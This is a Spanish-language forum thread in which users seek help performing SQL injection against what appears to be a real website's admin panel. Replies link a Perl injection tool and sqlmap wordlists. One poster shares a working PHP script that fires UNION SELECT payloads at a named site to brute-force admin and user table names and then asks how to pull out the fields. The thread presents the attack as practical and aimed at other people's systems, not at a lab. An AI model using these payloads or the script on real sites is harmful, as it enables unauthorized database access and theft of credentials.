(DUDA) Haciendo SQL Injection.

aagos · 30 Julio 2009, 14:33 PM

uff muchas gracias soy incapaz de compilar el codigo me da siempre "invalid syntax" voy a probar otros metodos

Novlucker · 30 Julio 2009, 15:43 PM

No he probado el code, pero veo un raw_input que no funciona en la última versión de python (se ha sustituído), cambialo por input.
Además el print debe de llevar paréntesis, pero bueno, si no tienes idea de esto mejor hacerlo a mano

Saludos

CitarEdite mi post para agregar el otro problema del script, no iba a poner otro porque básicamente no agrega mucho más al tema del SQL injection

aagos · 30 Julio 2009, 16:14 PM

Tampoco amigo Novlucker pero gracias

Una ultima cosa todas las inyecciones las estoy haciendo desde URL modificando algunos parametros con el Tamper Data la base de datos es MySQL 5.0.27 y casi todas las inyecciones me devuelven:

Este fichero XML no parece tener ninguna información de estilo asociada. Se muestra debajo el árbol del documento.

−
<datos>
<resultado>-4</resultado>
</datos>

He llegado asta aqui "/admin/index.php?sc=fli" pero no consigo sacar ningun dato nisiquiera me da ningun error"
Gracias

MagnoBalt · 30 Julio 2009, 19:05 PM

Hola aagos. Ahi te paso un Script en Perl hecho por Loggin-root. Si estas en Linux no tendras ningun drama con perl pero en widnows tenes que bajarte el interprete.. Busca en Google..
Aqui va el Link.. valga la redundancia esta codeado en perl

http://argentinasec.blogspot.com/2008/07/sql-pw-v07-by-login-root.html

Saludos!!

aagos · 30 Julio 2009, 22:19 PM

Muchas gracias estoy aprendiendo muchisimo

negretei22 · 27 Marzo 2012, 19:26 PM

Ya pude obtener la tabla de admin con un codigo SQL para php que hice, ahora los campos lo tengo que hacer de la misma manera??? con algun diccionari ode campos y probando campo por campo? a continuacion les dejo el codigo que hice...

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>Untitled Document</title>
</head>

<body>
<?
$pagina="http://www.susitio.com/consejos_detalle.php?advice_id=-2%20UNION/*!%20SELECT*/%201,version%28%29,3,4,5,6,7,8,9,10%20from%20users##";
$tablas=array("admin","tblUsers","tbl_users","tbl_admin","tblAdmin","user","users","username","usernames","usuario","name","names","nombre","nombres","usuarios","member","members","admin_table","miembro","miembros","membername","admins","administrator","administrators","passwd","password","passwords","pass","Pass","user_password","usua_login","user_passwords","user_name","user_names","member_password","mods","mod","moderators","moderator","user_email","user_emails","user_mail","user_mails","mail","emails","email","address","e-mail","emailaddress","correo","correos","phpbb_users","log","logins","login","registers","register","usr","usrs","banners");
echo "Leidas: " .count($tablas) ." palabras<br>";

/*$contenido = file($pagina);

$fp = fopen($contenido,"r") or die("OPEN");
echo $fp;*/
echo "<table><tr><td>Tabla</td><td>Resultado</td></tr>";
for($x=0;$x<count($tablas);$x++){
$pagina="http://www.susitio.com/consejos_detalle.php?advice_id=-2%20UNION/*!%20SELECT*/%201,9999,3,4,5,6,7,8,9,10%20from%20".$tablas[$x]."##";
      $fp = fopen($pagina, 'r');
$content = '';
while ($l = fread($fp, 1024)) $content .= $l;
fclose($fp);
      $encuentra = strpos($content, "doesn't exist");
      if($encuentra)
      echo "<tr><td>".$tablas[$x]."</td><td>NO</td></tr>";
      else
      echo "<tr><td>".$tablas[$x]."</td><td><a href='sacacampos.php?pagina=".$pagina."'>SI</td></tr>";


}


?>
</body>
</html>

Saludos!

afdlkglfgfdgfhgf · 1 Abril 2012, 23:57 PM

te aporto con los common-columns , common-table y common-output , que trae por defecto sqlmap para que lo agregues en tu script.

http://www.2shared.com/file/e64Q8TWE/common.html

suerte

.